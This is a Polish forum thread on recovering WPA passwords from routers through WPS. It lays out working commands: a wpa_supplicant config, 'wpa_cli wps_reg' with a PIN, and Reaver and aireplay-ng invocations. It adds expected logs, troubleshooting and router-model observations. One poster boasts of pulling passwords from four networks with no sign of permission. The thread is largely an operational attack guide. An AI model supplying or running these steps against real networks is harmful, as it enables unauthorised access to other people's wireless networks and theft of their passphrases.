Ocena wątku:
  • 3 głosów - średnia: 5
  • 1
  • 2
  • 3
  • 4
  • 5
WPS, reaver 1.4 svn
#1
Faktycznie metoda przy użyciu wps_supplicant-a oraz wpa_cli działa.

Tworzymy plik: abc.cfg a w nim:
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1

Potem odpalamy wpa_supplicant-a:
wpa_supplicant -Dwext -iwlan0 -c./abc.cfg –B

I dalej sterujemy nim z klienta:
wpa_cli

> status #tylko pokazuje stan połączenia
> wps_reg bssid wps_pin
To łączy nas do AP i wpisuje hasło do w pliku abc.cfg

Zrobiłem próbę na kilku AP które posiadam okazuje się że te które mają takowego WPS-a to WR1043ND WR2543ND inne np. DIR-635 DIR-815 kilka Netgear-ów i Linksys-ów nie wykazują takiej opcji.

Najdziwniejsze jest to że sieci którą widać nazywa się np. "Marek" ale po wrzuceniu do wpa_supplicanta dostaje Network-XXXXXXXXXX

Router sam ustawia tą nazwę Network-XXXXXXXXX
#2
Potwierdzam :) To działa, hihi, ale jaja :D

Połączyło mnie z 4 sieciami, wyciągneło ładnie hasła i zapisało grzecznie w pliku :)
Wyciągnęło mi także hasło do tego typu sieci, gdzie był opisywany wielokrotnie błąd, czyli te dziwaczne ciągi alfanumeryczne. Teraz podało mi także ciąg alfanumeryczny, ale tym razem prawidłowy i... połączyło z siecią. Sprawdziłem ponownie, zrobiłem wszystko od początku i znów podało mi ten sam ciąg znaków. Jaja maksymalne :).

UWAGA 1:
Oczywiście tryb monitora ma być wyłączony (OFF).

UWAGA 2:
Trzeba zwrócić uwagę, który interfejs jest używany w wpa_supplicant: wlan0, wlan1, czy wlan2, itp, bo będzie wywalać błędy.

UWAGA 3:
wpa_supplicant po odpaleniu będzie wywalać różne komunikaty. Trzeba poczekać trochę aż porzeźbi i da tego typu komunikat:
Kod:
...
<2>CTRL-EVENT-SCAN-RESULTS
<2>WPS-AP-AVAILABLE
<2>Trying to associate with 00:xx:xx:xx:xx:xx (SSID='nazwa_sieci' freq=2422 MHz)
<2>Associated with 00:xx:xx:xx:xx:xx
<2>CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully (based on lower layer success)
<2>WPA: Key negotiation completed with 00:xx:xx:xx:xx:xx [PTK=CCMP GTK=CCMP]
<2>CTRL-EVENT-CONNECTED - Connection to 00:xx:xx:xx:xx:xx completed (reauth) [id=0 id_str=]
Po tym można sprawdzić, co jest w pliku abc.cfg.

U mnie też jest tak samo, że pokazuje mi sieć w stylu Network-XXXXXXXXX, mimo że w rzeczywistości ma inną nazwę.

Niestety trochę problematyczne jest kolejne 'poszukiwanie' PIN-u. Trochę dziwne, ale u mnie trzeba było odłączyć kartę z portu USB i wpisać:
Kod:
killall wpa_supplicant
killall wpa_cli

Potem trzeba chwilę poczekać, podłączyć kartę spowrotem i usunąć zawartość pliku abc.cfg do tekstu początkowego, tak jak napisał Tommy. Potem zapisać plik i wyjść z edytora. I można znowu jechać...
Ostatecznie zamiast tego można uruchomić ponownie BT5 i wyjdzie na to samo.

Fajnie by było napisać jakieś proste GUI do tego rodzaju 'operacji', coś w stylu Inflatora, gdzie podawalibyśmy tylko BSSID i numer PIN - wyciągniety wcześniej Reaver'em. I oczywiście wrzucić do kolejnej wersji BT5. Troszkę by to uprościło całą akcję, ale i tak jest czad :).

BTW: Może warto zmienić tytuł całego tematu na np: wps_supplicant i wpa_cli - działanie albo wps_supplicant i wpa_cli - opis działania, albo coś w ten deseń?
Reaver - mój ulubiony program...
#3
Ja pojutrze będę testował :). Może warto dopisać przetestowane rozwiązanie poszukującym do http://code.google.com/p/reaver-wps/issues/list - te dwa rozwiązania? :
a) z wpa_cli
b) z reaver i aireplay-ng z drugiego posta
#4
Niestety mi jakoś nie działa to z Reaver'em i aireplay-ng. Mogę sobie czekać i czekać i właściwie tak, jak się nic nie działo, tak nic się nie dzieje.

Terminal 1:
aireplay-ng -1 5 -a xx:xx:xx:xx:xx:xx mon0
Kod:
01:24:03  Sending Authentication Request (Open System) [ACK]
01:24:03  Authentication successful
01:24:03  Sending Association Request [ACK]
01:24:03  Association successful :-) (AID: 1)

Terminal 2:
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c 1 -e "nazwa_sieci" -a -A -S -v
Kod:
...
Pin 12345670
Pin 12345670
Pin 12345670
Pin 12345670
...

Co ciekawe, bez używania aireplay-ng i bez -A w Reaver, PIN-y lecą z przystępną prędkością :)
Reaver - mój ulubiony program...
#5
Dawaj zawsze w reaverze podwójne v:
Kod:
-vv
Widać co się dzieje z transmisją. U mnie tylko reaver -A + aireplay dawał radę na routerze mimo dobrego sygnału.
#6
Dodawanie autoryzacji z aireplay-ng to marny pomysł...

Zauważyłem bardzo niefajną rzecz w WPS-ie QSS TP-Link-a, AP po autoryzacji wps_supplicant-em zmienia hasło na nowe, działa ono tylko do ESSID-a Network-XXXXXX ale klient dodany wcześniej za pomocą WPS traci możliwość połączenia. Jeżeli jeszcze raz się autoryzuje WPS-em to znowu nam zmienia hasło.

Hasło które wyciąga reaver, DZIAŁA! ale do ESSID-a Network-XXXXXX który nie jest rozgłaszany.

QSS daje możliwość dodania więcej niż jednego klienta w swoim GUI "Add Device"
#7
Tommy: a jeśłi client nie autoryzował się WPS tylko normalnie przez hasło to wtedy autoryzacja przez wps_supplicant nie zmienia hasła dostępu do sieci, prawda? Klienci mają cały czas takie samo hasło stare.
#8
Testowałem trochę i WYDAJE mi się że te hasła z przypadkowych znaków generuje WPS tylko gdy każdy klient jest połączony przez WPS. Jeżeli WPS nie był użyty to reaver pokaże normalne hasło które ktoś ustawił w webgui.

Reasumując to nie jest błąd reaver-a tylko normalne zachowanie WPS.
Sprawdziłem to już kilka razy.
#9
Pojawił się jeszcze dziwny przypadek, mianowicie router z ukrytą nazwą sieci (którą oczywiście znam) i prawidłowym PIN nie potrafi się zautoryzować przez wpa_supplificant tym sposobem co napisane wyżej, log wpa_cli wyrzuca: trying to MAC_WIFI, status: w trakcie połączenia i tak w kółko. Na routerze autoryzacja poprzez MAC jest wyłączona, router zgrabnie reaguje na wstrzykiwanie przez aireplay -1 .poziom sygnału ok. 70.
W innej sieci z pokazaną nazwą wpa_supplificant działa bez problemu tą metodą. Macie jakiś pomysł?
#10
Może WPS jest wyłączony...


Podobne wątki
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  WPS brute-force offline ffrreeaakk 0 1,227 09-01-2014, 23:42
Ostatni post: ffrreeaakk
  reaver 1.4 - kali linux Reenlam 3 1,693 04-28-2014, 4:01
Ostatni post: shogun
  Reaver- mozolne działanie, jeśli w ogóle działa.... materna11 9 2,169 10-27-2013, 15:09
Ostatni post: Bysiek
  REAVER nie może złamać PIN'u. laks0994 3 1,707 10-25-2013, 0:50
Ostatni post: Tommy
Wink reaver spyagent007 4 1,402 09-23-2013, 17:47
Ostatni post: Tommy
  wps komendy laks0994 26 6,195 09-12-2013, 20:18
Ostatni post: laks0994
  Reaver + netiaspot michalm1 15 5,387 08-02-2013, 14:32
Ostatni post: hancock
  WPS PIN konradka 15 3,698 03-11-2013, 18:44
Ostatni post: konradka
  Reaver zawiesza się na jednym pinie BlackHornet 4 1,836 02-27-2013, 21:04
Ostatni post: jackkk
  Suma kontrolna pinu WPS zoidberg 6 2,016 01-23-2013, 21:07
Ostatni post: K13

Skocz do:


Użytkownicy przeglądający ten wątek: 1 gości
stat4u